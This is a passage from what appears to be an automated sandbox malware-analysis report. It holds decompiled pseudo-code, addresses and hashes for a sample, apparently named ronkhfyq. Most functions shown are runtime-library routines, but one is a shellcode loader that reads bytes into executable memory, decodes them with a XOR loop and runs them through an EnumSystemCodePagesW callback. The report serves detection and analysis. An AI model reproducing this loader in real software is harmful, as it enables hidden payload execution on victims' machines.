					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00E11CD3())) = 0x16;
				goto L4;
			}




























              0x00e112cc
              0x00e112cf
              0x00e112d5
              0x00e112d8
              0x00e112db
              0x00e112f8
              0x00000000
              0x00e112f8
              0x00e112dd
              0x00e112e2
              0x00000000
              0x00000000
              0x00e112e6
              0x00e11301
              0x00e11304
              0x00e11306
              0x00e11314
              0x00e11314
              0x00e11318
              0x00e11320
              0x00e11325
              0x00e11325
              0x00e11328
              0x00e1132a
              0x00000000
              0x00e1132c
              0x00e1132c
              0x00e11334
              0x00e11336
              0x00000000
              0x00000000
              0x00e11338
              0x00e1133b
              0x00e1133e
              0x00e11345
              0x00e11347
              0x00e1134e
              0x00e11349
              0x00e11349
              0x00e11349
              0x00e11353
              0x00e11356
              0x00e11358
              0x00e11441
              0x00000000
              0x00e1135e
              0x00e1135e
              0x00e1135e
              0x00e11365
              0x00e113a6
              0x00e113a6
              0x00e113a8
              0x00e11413
              0x00e11419
              0x00e1141c
              0x00e11473
              0x00000000
              0x00e11479
              0x00e1141e
              0x00e11421
              0x00e11423
              0x00e11449
              0x00e11449
              0x00e1144d
              0x00e11457
              0x00e1145c
              0x00e11464
              0x00e112f3
              0x00e112f3
              0x00000000
              0x00e112f3
              0x00e11425
              0x00e11428
              0x00e1142b
              0x00e1142c
              0x00e1142f
              0x00e1142f
              0x00e11430
              0x00e11433
              0x00e11436
              0x00000000
              0x00e11436
              0x00e113aa
              0x00e113ac
              0x00e113d0
              0x00e113d5
              0x00e113db
              0x00e113dd
              0x00e113dd
              0x00e113ae
              0x00e113b0
              0x00e113b6
              0x00e113c8
              0x00e113c8
              0x00e113c8
              0x00e113ca
              0x00e113b8
              0x00e113bd
              0x00e113bf
              0x00e113bf
              0x00e113cc
              0x00e113cc
              0x00e113df
              0x00e113e2
              0x00000000
              0x00e113e4
              0x00e113e4
              0x00e113e5
              0x00e113ef
              0x00e113f0
              0x00e113f5
              0x00e113f8
              0x00e113fa
              0x00e11481
              0x00000000
              0x00e11481
              0x00e11400
              0x00e11403
              0x00e1146f
              0x00e1146f
              0x00e1146f
              0x00e1146f
              0x00000000
              0x00e1146f
              0x00e11405
              0x00e11405
              0x00e11407
              0x00e11407
              0x00e1140a
              0x00e1140d
              0x00000000
              0x00e1140d
              0x00e113e2
              0x00e11367
              0x00e1136a
              0x00e1136d
              0x00e1136f
              0x00000000
              0x00000000
              0x00e11371
              0x00000000
              0x00000000
              0x00e11377
              0x00e11379
              0x00e1137b
              0x00e1137d
              0x00e1137d
              0x00e11380
              0x00e11383
              0x00e11385
              0x00000000
              0x00e1138b
              0x00e11392
              0x00e11397
              0x00e1139a
              0x00e1139d
              0x00e113a0
              0x00e113a2
              0x00000000
              0x00e113a2
              0x00e11439
              0x00e11439
              0x00e11439
              0x00000000
              0x00e1135e
              0x00e11358
              0x00e1132a
              0x00e1130d
              0x00e11310
              0x00e11312
              0x00000000
              0x00000000
              0x00000000
              0x00e11312
              0x00e112e8
              0x00e112ed
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
              • String ID:
              • API String ID: 1559183368-0
              • Opcode ID: 7d16c50f304548ff61ccfb1f943ff7faf915b09239512d226c9cd4ed4bc762dc
              • Instruction ID: db6e97dcb2303dbdc70d5a3b8f4296e61b3e584acf5095c4c76aafe3c8e9ab21
              • Opcode Fuzzy Hash: 7d16c50f304548ff61ccfb1f943ff7faf915b09239512d226c9cd4ed4bc762dc
              • Instruction Fuzzy Hash: 6551E770A00305DBCB249FA9C8806EEB7A6AF40724F2493ADFA35B66D4D7709DD0DB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E11000 Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 92%
              			E00E11000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				_Unknown_base(*)()* _t8;
				void* _t23;
				_Unknown_base(*)()* _t24;
				void* _t29;
				void* _t30;
				void* _t31;
				intOrPtr* _t37;

				_push(_t23);
				_t31 = 0; // executed
				_t6 = E00E11151(_t23, _t29, 0, 0x17d78400); // executed
				 *_t37 = 0xe23000;
				_v8 = _t6;
				_t7 = E00E111E3(_a12, _t30); // executed
				_t8 = VirtualAlloc(0, 0x148a, 0x3000, 0x40); // executed
				_t24 = _t8;
				E00E11487(_t24, 0x148a, 1, _t7); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					E00E11540(_t10, 0xcb, 0x17d78400);
					do {
						 *(_t24 + _t31) = (((( *(_t24 + _t31) ^ 0x0000009d) + 0x00000001 ^ 0x000000d0) + 0x0000007f ^ 0x000000c5) + 0x00000001 ^ 0x000000b7) + 0x32;
						_t31 = _t31 + 1;
					} while (_t31 < 0x148a);
					EnumSystemCodePagesW(_t24, 0); // executed
				}
				return 0;
			}















              0x00e11004
              0x00e1100c
              0x00e1100e
              0x00e11013
              0x00e1101d
              0x00e11020
              0x00e11036
              0x00e11044
              0x00e11048
              0x00e1104d
              0x00e11055
              0x00e11062
              0x00e1106a
              0x00e1107d
              0x00e11080
              0x00e11081
              0x00e11088
              0x00e11088
              0x00e11094

              APIs
              • _malloc.LIBCMT ref: 00E1100E
                • Part of subcall function 00E11151: __FF_MSGBANNER.LIBCMT ref: 00E11168
                • Part of subcall function 00E11151: __NMSG_WRITE.LIBCMT ref: 00E1116F
                • Part of subcall function 00E11151: RtlAllocateHeap.NTDLL(00B50000,00000000,00000001,00000000,00000000,00000000,?,00E148D7,00000000,00000000,00000000,00000000,?,00E14509,00000018,00E22280), ref: 00E11194
                • Part of subcall function 00E111E3: __wfsopen.LIBCMT ref: 00E111EE
              • VirtualAlloc.KERNELBASE(00000000,0000148A,00003000,00000040), ref: 00E11036
              • __fread_nolock.LIBCMT ref: 00E11048
              • _memset.LIBCMT ref: 00E11062
              • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 00E11088
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
              • String ID:
              • API String ID: 3693343133-0
              • Opcode ID: c8205ae9f1c4967ab717212f731c0c687b37a332009c5680d208f2a0fee8b9b5
              • Instruction ID: 5c372068dd45a11ccc246e57f51a2a34b8f7bc3f86af1f7d8f098d327493c5ed
              • Opcode Fuzzy Hash: c8205ae9f1c4967ab717212f731c0c687b37a332009c5680d208f2a0fee8b9b5
              • Instruction Fuzzy Hash: 2B014C71A053047BF72027715C4BFDF7B98DB55758F201491FA01B7182E5F499829274
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E114A2 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 89%
              			E00E114A2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0xe22170);
				E00E12410(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E00E11F6E(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E00E112C2( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E00E1152B(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E00E11540( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E00E11CD3())) = 0x16;
						E00E11E99();
						goto L6;
					}
				}
				return E00E12455(_t16);
			}







              0x00e114a2
              0x00e114a4
              0x00e114a9
              0x00e114b0
              0x00e114b6
              0x00e114e9
              0x00e114e9
              0x00e114bd
              0x00e114bd
              0x00e114c2
              0x00e114f2
              0x00e114f8
              0x00e11508
              0x00e11510
              0x00e11512
              0x00e11515
              0x00e1151c
              0x00e11521
              0x00e114c4
              0x00e114c8
              0x00e114d1
              0x00e114d6
              0x00e114de
              0x00e114e4
              0x00000000
              0x00e114e4
              0x00e114c2
              0x00e114f0

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __lock_file_memset
              • String ID:
              • API String ID: 26237723-0
              • Opcode ID: 1b287eb6516a61880c8cc76e644dd60dfac4c9e867be5a262b966aba13f83cfe
              • Instruction ID: 96071e893695b76e386675bc21c71c910502bc990a016a18a5271f01b51ced0b
              • Opcode Fuzzy Hash: 1b287eb6516a61880c8cc76e644dd60dfac4c9e867be5a262b966aba13f83cfe
              • Instruction Fuzzy Hash: D101F771801209EBCF21AFA5DC018DE7BF1AF80760F10A199FB3476191E7358AA2DB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E111E3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 102 e111e3-e111f7 call e111f8
              C-Code - Quality: 25%
              			E00E111E3(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00E111F8(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}









              0x00e111e6
              0x00e111e8
              0x00e111eb
              0x00e111ee
              0x00e111f7

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __wfsopen
              • String ID:
              • API String ID: 197181222-0
              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
              • Instruction ID: 05dcda55346e0054598a578fe5cfd7a083e577ac69570038a5c4355147036482
              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
              • Instruction Fuzzy Hash: 81B092B254020C77CF012A82EC02A897B599B40660F008060FF1C28171A673A6A49689
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00E143DC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E00E143DC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



              0x00e143e1
              0x00e143f1

              APIs
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E11E3A,?,?,?,00000000), ref: 00E143E1
              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00E143EA
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 61457ff062c6cbefd58870b668cf4ce4b00f98292d0846569f49146559ec9ab6
              • Instruction ID: 0e609f2afc9b47249f1728fbb4e1fa57a96e22528cc791f96090dc3f15887469
              • Opcode Fuzzy Hash: 61457ff062c6cbefd58870b668cf4ce4b00f98292d0846569f49146559ec9ab6
              • Instruction Fuzzy Hash: 4FB09235285208BFCB002F92EC0DBAC3F28EB14752F008410FA0D54260CB7254148A92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E143AB Relevance: 1.5, APIs: 1, Instructions: 6COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00E143AB(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



              0x00e143b8

              APIs
              • SetUnhandledExceptionFilter.KERNEL32(?,?,00E13457,00E1340C), ref: 00E143B1
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: dd9a5dd78e810a1764713beebccc799d2c10a7ccf9907da7143cbbe6d3b89bbe
              • Instruction ID: a69c487fe153b0cd5fa7a8809c7a0dd5192f3d9e949bf7c59f9a386e30a0be3b
              • Opcode Fuzzy Hash: dd9a5dd78e810a1764713beebccc799d2c10a7ccf9907da7143cbbe6d3b89bbe
              • Instruction Fuzzy Hash: 1FA0113008020CBB8A002F82EC088A83F2CEB002A0B008020F80C00220CB32A8208A82
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E138B8 Relevance: 12.2, APIs: 8, Instructions: 229COMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E00E138B8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0xe22260);
				E00E12410(__ebx, __edi, __esi);
				E00E1443F(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E00E14879();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0xe24848 = _t82;
					 *0xe250e4 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0xe24848; // 0xb727e0
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0xe24848;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0xe26100;
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91);
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -14829628
											E00E140B2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E00E13B63();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E00E12455(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0xe250e4 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E00E14879(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0xe24848[_t149] = _t138;
							 *0xe250e4 =  *0xe250e4 + _t141;
							__eflags =  *0xe250e4;
							while(1) {
								__eflags = _t138 - 0x800 + 0xe24848[_t149];
								if(_t138 >= 0x800 + 0xe24848[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0xe250e4; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0xe24848[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E00E140B2(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E00E12610(_t155, 0xe23400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























              0x00e138b8
              0x00e138ba
              0x00e138bf
              0x00e138c6
              0x00e138ce
              0x00e138d1
              0x00e138d5
              0x00e138d6
              0x00e138d7
              0x00e138de
              0x00e138e0
              0x00e138e5
              0x00e13902
              0x00e13907
              0x00e1390d
              0x00e13912
              0x00e13914
              0x00000000
              0x00000000
              0x00e13916
              0x00e1391c
              0x00e1391f
              0x00e13922
              0x00e1392b
              0x00e1392e
              0x00e13934
              0x00e13937
              0x00e1393a
              0x00e1393d
              0x00e13940
              0x00e13940
              0x00e1394b
              0x00e13951
              0x00e13956
              0x00e13a8b
              0x00e13a8d
              0x00e13a8e
              0x00e13a8e
              0x00e13a8e
              0x00e13a90
              0x00e13a90
              0x00e13a93
              0x00e13a96
              0x00000000
              0x00000000
              0x00e13aa1
              0x00e13aa7
              0x00e13aaa
              0x00e13aad
              0x00e13ac1
              0x00e13ac1
              0x00e13ac5
              0x00e13ac7
              0x00e13ace
              0x00e13ad3
              0x00e13ad5
              0x00e13ad5
              0x00e13ac9
              0x00e13acb
              0x00e13acb
              0x00e13ad9
              0x00e13adf
              0x00e13ae2
              0x00e13ae5
              0x00e13b33
              0x00e13b39
              0x00e13b3c
              0x00e13b3e
              0x00e13b43
              0x00e13b45
              0x00e13b4a
              0x00e13b4a
              0x00000000
              0x00e13ae7
              0x00e13ae7
              0x00e13ae9
              0x00000000
              0x00000000
              0x00e13aec
              0x00e13af2
              0x00e13af4
              0x00000000
              0x00000000
              0x00e13af9
              0x00e13afb
              0x00e13b00
              0x00e13b03
              0x00e13b0d
              0x00e13b10
              0x00e13b1b
              0x00e13b22
              0x00e13b26
              0x00e13b2b
              0x00e13b2e
              0x00e13b4d
              0x00e13b4d
              0x00000000
              0x00e13b4d
              0x00e13b16
              0x00e13b16
              0x00e13b18
              0x00e13b18
              0x00000000
              0x00e13b18
              0x00e13b09
              0x00000000
              0x00e13b09
              0x00e13ae5
              0x00e13aaf
              0x00e13ab1
              0x00000000
              0x00000000
              0x00e13ab9
              0x00000000
              0x00e13ab9
              0x00e13b53
              0x00e13b56
              0x00e13b5b
              0x00e13b5b
              0x00e13b5d
              0x00e13b62
              0x00e13b62
              0x00e1395c
              0x00e1395f
              0x00e13961
              0x00000000
              0x00000000
              0x00e13967
              0x00e13969
              0x00e1396c
              0x00e1396f
              0x00e13974
              0x00e1397c
              0x00e1397e
              0x00e13980
              0x00e13982
              0x00e13982
              0x00e13987
              0x00e13987
              0x00e13988
              0x00e1398b
              0x00e1398b
              0x00e13991
              0x00000000
              0x00000000
              0x00e1399d
              0x00e1399f
              0x00e139a2
              0x00e139a4
              0x00e13a3e
              0x00e13a45
              0x00e13a45
              0x00e13a4b
              0x00e13a57
              0x00e13a59
              0x00000000
              0x00000000
              0x00e13a5b
              0x00e13a61
              0x00e13a64
              0x00e13a67
              0x00e13a6b
              0x00e13a71
              0x00e13a74
              0x00e13a77
              0x00e13a7a
              0x00e13a7a
              0x00e13a7f
              0x00e13a80
              0x00e13a83
              0x00000000
              0x00e13a83
              0x00e139aa
              0x00e139b0
              0x00000000
              0x00e139b0
              0x00e139b3
              0x00e139b5
              0x00e139ba
              0x00e139bb
              0x00e139be
              0x00e139c1
              0x00e139c1
              0x00e139c3
              0x00000000
              0x00000000
              0x00e139c9
              0x00e139cb
              0x00e139ce
              0x00e13a2b
              0x00e13a2b
              0x00e13a2c
              0x00e13a32
              0x00e13a33
              0x00e13a36
              0x00e13a39
              0x00000000
              0x00e13a39
              0x00e139d0
              0x00e139d2
              0x00000000
              0x00000000
              0x00e139d4
              0x00e139d6
              0x00e139d8
              0x00000000
              0x00000000
              0x00e139da
              0x00e139dc
              0x00e139ec
              0x00e139f9
              0x00e13a00
              0x00e13a05
              0x00e13a0c
              0x00e13a16
              0x00e13a1a
              0x00e13a1f
              0x00e13a22
              0x00e13a22
              0x00e13a22
              0x00e13a25
              0x00e13a28
              0x00e13a28
              0x00000000
              0x00e13a28
              0x00e139df
              0x00e139e5
              0x00e139e8
              0x00e139ea
              0x00000000
              0x00000000
              0x00000000
              0x00e139ea
              0x00000000
              0x00e139c1
              0x00e138fa
              0x00000000

              APIs
              • __lock.LIBCMT ref: 00E138C6
                • Part of subcall function 00E1443F: __mtinitlocknum.LIBCMT ref: 00E14451
                • Part of subcall function 00E1443F: EnterCriticalSection.KERNEL32(00000000,?,00E137BB,0000000D), ref: 00E1446A
              • __calloc_crt.LIBCMT ref: 00E138D7
                • Part of subcall function 00E14879: __calloc_impl.LIBCMT ref: 00E14888
              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E138F2
              • GetStartupInfoW.KERNEL32(?,00E22260,00000064,00E11664,00E22190,00000014), ref: 00E1394B
              • __calloc_crt.LIBCMT ref: 00E13996
              • GetFileType.KERNEL32(00000001), ref: 00E139DF
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
